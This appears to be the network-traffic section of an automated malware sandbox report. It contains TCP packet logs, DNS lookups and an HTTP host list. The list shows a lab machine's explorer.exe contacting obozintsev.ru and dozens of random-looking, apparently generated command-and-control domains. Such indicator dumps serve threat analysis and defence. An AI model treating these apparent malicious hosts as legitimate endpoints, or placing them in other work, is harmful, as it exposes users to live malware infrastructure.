                                                                                                                        Nov 30, 2024 11:14:05.094733000 CET8049927189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:05.094798088 CET4992780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:05.094893932 CET4992780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:05.101079941 CET4993280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:05.217745066 CET8049927189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:05.221620083 CET8049932189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:05.221695900 CET4993280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:05.221851110 CET4993280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:05.221868992 CET4993280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:05.343334913 CET8049932189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:05.344007969 CET8049932189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:07.246759892 CET8049932189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:07.246849060 CET8049932189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:07.246905088 CET4993280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:07.247052908 CET4993280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:07.255489111 CET4993780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:07.367266893 CET8049932189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:07.375477076 CET8049937189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:07.375555992 CET4993780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:07.375758886 CET4993780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:07.375781059 CET4993780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:07.496345043 CET8049937189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:07.496392965 CET8049937189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:09.165790081 CET8049937189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:09.171569109 CET8049937189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:09.171650887 CET4993780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:09.171828985 CET4993780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:09.175662041 CET4994180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:09.291863918 CET8049937189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:09.295599937 CET8049941189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:09.295778990 CET4994180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:09.295814037 CET4994180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:09.295829058 CET4994180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:09.416037083 CET8049941189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:09.416090965 CET8049941189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:11.135932922 CET8049941189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:11.136074066 CET8049941189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:11.136133909 CET4994180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:11.136172056 CET4994180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:11.145404100 CET4994680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:11.256122112 CET8049941189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:11.265588045 CET8049946189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:11.265682936 CET4994680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:11.306545019 CET4994680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:11.306545019 CET4994680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:11.426549911 CET8049946189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:11.426609039 CET8049946189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:11.867687941 CET49949443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:14:11.867718935 CET44349949207.246.75.248192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:11.867811918 CET49949443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:14:11.868218899 CET49949443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:14:11.868230104 CET44349949207.246.75.248192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:13.296889067 CET8049946189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:13.296952009 CET8049946189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:13.297020912 CET4994680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:13.297283888 CET4994680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:13.305887938 CET4995380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:13.417155027 CET8049946189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:13.425812006 CET8049953189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:13.425889969 CET4995380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:13.426032066 CET4995380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:13.426074028 CET4995380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:13.545979023 CET8049953189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:13.546071053 CET8049953189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:15.211502075 CET8049953189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:15.211560965 CET8049953189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:15.211719990 CET4995380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:15.211853981 CET4995380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:15.216741085 CET4995980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:15.332180977 CET8049953189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:15.336693048 CET8049959189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:15.336791039 CET4995980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:15.336947918 CET4995980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:15.336958885 CET4995980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:15.457818985 CET8049959189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:15.457832098 CET8049959189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:17.129673004 CET8049959189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:17.129772902 CET8049959189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:17.129851103 CET4995980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:17.131385088 CET4995980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:17.251997948 CET8049959189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:56.054718971 CET44349949207.246.75.248192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:56.054784060 CET49949443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:14:56.054831028 CET49949443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:14:56.054841995 CET44349949207.246.75.248192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:56.055386066 CET50046443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:14:56.055448055 CET44350046207.246.75.248192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:56.055511951 CET50046443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:14:56.055958986 CET50046443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:14:56.055989027 CET44350046207.246.75.248192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:27.606290102 CET5006180192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:27.726496935 CET8050061123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:27.726646900 CET5006180192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:27.765614033 CET5006180192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:27.765676975 CET5006180192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:27.885701895 CET8050061123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:27.885715961 CET8050061123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:29.907083035 CET8050061123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:29.907196045 CET8050061123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:29.907269001 CET5006180192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:29.907381058 CET5006180192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:30.027416945 CET8050061123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:37.599111080 CET5006280192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:37.719223022 CET8050062123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:37.719434977 CET5006280192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:37.719506025 CET5006280192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:37.719540119 CET5006280192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:37.839412928 CET8050062123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:37.839538097 CET8050062123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:39.773937941 CET8050062123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:39.773993969 CET8050062123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:39.774346113 CET5006280192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:39.774346113 CET5006280192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:39.894500971 CET8050062123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:40.087188959 CET44350046207.246.75.248192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:40.087292910 CET50046443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:15:40.087393999 CET50046443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:15:40.087438107 CET44350046207.246.75.248192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:40.097280025 CET50063443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:15:40.097316980 CET44350063207.246.75.248192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:40.097376108 CET50063443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:15:40.098084927 CET50063443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:15:40.098135948 CET44350063207.246.75.248192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:40.098187923 CET50063443192.168.2.4207.246.75.248
                                                                                                                        Nov 30, 2024 11:15:40.515969992 CET50064443192.168.2.4103.35.190.240
                                                                                                                        Nov 30, 2024 11:15:40.515994072 CET44350064103.35.190.240192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:40.516072989 CET50064443192.168.2.4103.35.190.240
                                                                                                                        Nov 30, 2024 11:15:40.516452074 CET50064443192.168.2.4103.35.190.240
                                                                                                                        Nov 30, 2024 11:15:40.516464949 CET44350064103.35.190.240192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:48.662132978 CET5006580192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:48.782183886 CET8050065123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:48.782263041 CET5006580192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:48.782426119 CET5006580192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:48.782447100 CET5006580192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:48.902309895 CET8050065123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:48.902446985 CET8050065123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:50.871936083 CET8050065123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:50.872126102 CET8050065123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:50.872340918 CET5006580192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:50.872340918 CET5006580192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:15:50.992364883 CET8050065123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:16:00.493751049 CET5006680192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:16:00.614087105 CET8050066123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:16:00.614168882 CET5006680192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:16:00.614301920 CET5006680192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:16:00.614326000 CET5006680192.168.2.4123.213.233.131
                                                                                                                        Nov 30, 2024 11:16:00.735229969 CET8050066123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:16:00.735362053 CET8050066123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:16:02.791148901 CET8050066123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:16:02.791171074 CET8050066123.213.233.131192.168.2.4
                                                                                                                        Nov 30, 2024 11:16:02.791232109 CET5006680192.168.2.4123.213.233.131
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 30, 2024 11:12:20.192096949 CET5516253192.168.2.41.1.1.1
                                                                                                                        Nov 30, 2024 11:12:21.211153030 CET5516253192.168.2.41.1.1.1
                                                                                                                        Nov 30, 2024 11:12:22.238938093 CET5516253192.168.2.41.1.1.1
                                                                                                                        Nov 30, 2024 11:12:24.241425991 CET5516253192.168.2.41.1.1.1
                                                                                                                        Nov 30, 2024 11:12:24.784635067 CET53551621.1.1.1192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:24.784678936 CET53551621.1.1.1192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:24.784686089 CET53551621.1.1.1192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:24.784727097 CET53551621.1.1.1192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:09.509634972 CET5615553192.168.2.41.1.1.1
                                                                                                                        Nov 30, 2024 11:13:10.522713900 CET5615553192.168.2.41.1.1.1
                                                                                                                        Nov 30, 2024 11:13:10.655658960 CET53561551.1.1.1192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:10.660612106 CET53561551.1.1.1192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:11.102834940 CET5333453192.168.2.41.1.1.1
                                                                                                                        Nov 30, 2024 11:14:11.850492001 CET53533341.1.1.1192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:26.713681936 CET6461853192.168.2.41.1.1.1
                                                                                                                        Nov 30, 2024 11:15:27.596349955 CET53646181.1.1.1192.168.2.4
                                                                                                                        Nov 30, 2024 11:15:40.128400087 CET5615453192.168.2.41.1.1.1
                                                                                                                        Nov 30, 2024 11:15:40.508466005 CET53561541.1.1.1192.168.2.4
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Nov 30, 2024 11:12:20.192096949 CET192.168.2.41.1.1.10xb2deStandard query (0)obozintsev.ruA (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:21.211153030 CET192.168.2.41.1.1.10xb2deStandard query (0)obozintsev.ruA (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:22.238938093 CET192.168.2.41.1.1.10xb2deStandard query (0)obozintsev.ruA (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.241425991 CET192.168.2.41.1.1.10xb2deStandard query (0)obozintsev.ruA (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:13:09.509634972 CET192.168.2.41.1.1.10x11f5Standard query (0)midginvineco.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:13:10.522713900 CET192.168.2.41.1.1.10x11f5Standard query (0)midginvineco.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:14:11.102834940 CET192.168.2.41.1.1.10x1e61Standard query (0)jamforvaise.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:26.713681936 CET192.168.2.41.1.1.10xd2c1Standard query (0)obozintsev.ruA (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:40.128400087 CET192.168.2.41.1.1.10x2fb3Standard query (0)telphboardline.comA (IP address)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Nov 30, 2024 11:12:24.784635067 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru189.163.166.52A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784635067 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784635067 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru119.194.160.37A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784635067 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru186.137.126.27A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784635067 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784635067 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784635067 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru201.103.72.35A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784635067 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784635067 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru189.143.204.110A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784635067 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784678936 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru189.163.166.52A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784678936 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784678936 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru119.194.160.37A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784678936 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru186.137.126.27A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784678936 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784678936 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784678936 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru201.103.72.35A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784678936 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784678936 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru189.143.204.110A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784678936 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784686089 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru189.163.166.52A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784686089 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784686089 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru119.194.160.37A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784686089 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru186.137.126.27A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784686089 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784686089 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784686089 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru201.103.72.35A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784686089 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784686089 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru189.143.204.110A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784686089 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784727097 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru189.163.166.52A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784727097 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784727097 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru119.194.160.37A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784727097 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru186.137.126.27A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784727097 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784727097 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784727097 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru201.103.72.35A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784727097 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784727097 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru189.143.204.110A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:12:24.784727097 CET1.1.1.1192.168.2.40xb2deNo error (0)obozintsev.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:13:10.655658960 CET1.1.1.1192.168.2.40x11f5No error (0)midginvineco.com23.145.40.181A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:13:10.660612106 CET1.1.1.1192.168.2.40x11f5No error (0)midginvineco.com23.145.40.181A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:14:11.850492001 CET1.1.1.1192.168.2.40x1e61No error (0)jamforvaise.com207.246.75.248A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:27.596349955 CET1.1.1.1192.168.2.40xd2c1No error (0)obozintsev.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:27.596349955 CET1.1.1.1192.168.2.40xd2c1No error (0)obozintsev.ru119.194.160.37A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:27.596349955 CET1.1.1.1192.168.2.40xd2c1No error (0)obozintsev.ru186.137.126.27A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:27.596349955 CET1.1.1.1192.168.2.40xd2c1No error (0)obozintsev.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:27.596349955 CET1.1.1.1192.168.2.40xd2c1No error (0)obozintsev.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:27.596349955 CET1.1.1.1192.168.2.40xd2c1No error (0)obozintsev.ru201.103.72.35A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:27.596349955 CET1.1.1.1192.168.2.40xd2c1No error (0)obozintsev.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:27.596349955 CET1.1.1.1192.168.2.40xd2c1No error (0)obozintsev.ru189.143.204.110A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:27.596349955 CET1.1.1.1192.168.2.40xd2c1No error (0)obozintsev.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:27.596349955 CET1.1.1.1192.168.2.40xd2c1No error (0)obozintsev.ru189.163.166.52A (IP address)IN (0x0001)false
                                                                                                                        Nov 30, 2024 11:15:40.508466005 CET1.1.1.1192.168.2.40x2fb3No error (0)telphboardline.com103.35.190.240A (IP address)IN (0x0001)false
                                                                                                                        • midginvineco.com
                                                                                                                        • klvjvwlocecf.net
                                                                                                                          • obozintsev.ru
                                                                                                                        • totrulptsxj.net
                                                                                                                        • fkyftbqjpntne.com
                                                                                                                        • vwrmkfcdqeqnf.net
                                                                                                                        • ybhmruutgjll.com
                                                                                                                        • idmlsaxfuvndeti.net
                                                                                                                        • dqwcacyxyiufxcg.net
                                                                                                                        • vbibiexffybg.com
                                                                                                                        • rcoksbrtpdmb.com
                                                                                                                        • limsldbbguqnsba.com
                                                                                                                        • indpkapnwuhe.net
                                                                                                                        • wdrrntcgtbyvfp.net
                                                                                                                        • ehvxkgepwxtygl.com
                                                                                                                        • tejbjmlbuatgr.org
                                                                                                                        • otfwaojfoxegoc.org
                                                                                                                        • kqylhpxweftfa.org
                                                                                                                        • fgrdwevlbrdtr.com
                                                                                                                        • natewkewlwih.com
                                                                                                                        • fhaalrvyqueiyk.net
                                                                                                                        • ujchxvegkeooch.org
                                                                                                                        • pkapxutderw.org
                                                                                                                        • dqdghghmtaygindm.com
                                                                                                                        • ievirvwtsxbiyvql.com
                                                                                                                        • cdwxnwopeyrbni.org
                                                                                                                        • fgbhvviibbt.org
                                                                                                                        • miptxmfamtohobtx.net
                                                                                                                        • jwqwkqwentbhrv.com
                                                                                                                        • rtjqjvueogqtxkos.org
                                                                                                                        • ghrwspfuixcrwvx.net
                                                                                                                        • qyqahwjnqtjwf.com
                                                                                                                        • jjaaaitryycjvb.net
                                                                                                                        • reqhcetbeojgkny.net
                                                                                                                        • nsgtchrbqowj.org
                                                                                                                        • kjjcaejlhnascj.net
                                                                                                                        • ansopymmtehxip.org
                                                                                                                        • wyqtmqrstxfymqsq.org
                                                                                                                        • ngsmolqmjlkr.com
                                                                                                                        • xwimesajyti.org
                                                                                                                        • qasfskgmelreo.net
                                                                                                                        • xgfnddjygdt.org
                                                                                                                        • ciuapvhjnqxsxxwr.com
                                                                                                                        • egomlfgoxoteaymh.net
                                                                                                                        • ewsvhrknjfqh.com
                                                                                                                        • uqjegtiiabqrm.org
                                                                                                                        • mdwlauviipmapdo.com
                                                                                                                        • pjedtjbwdoay.org
                                                                                                                        • buqwtxgqsqkupxr.net
                                                                                                                        • lxgihqdoncikbgg.com
                                                                                                                        • pktfnvaxqpxmxps.net
                                                                                                                        • gsuntxougdhs.com
                                                                                                                        • unxnurhhgcwb.org
                                                                                                                        • cvixokerumeto.org
                                                                                                                        • fsnaumbblcik.net
                                                                                                                        • uwalktmlxvraf.com
                                                                                                                        • omlavaayevr.net
                                                                                                                        • iopuyoenyjytdheg.org
                                                                                                                        • xajywliqqhjs.com
                                                                                                                        • cjnppqrvkvd.org
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.449736189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
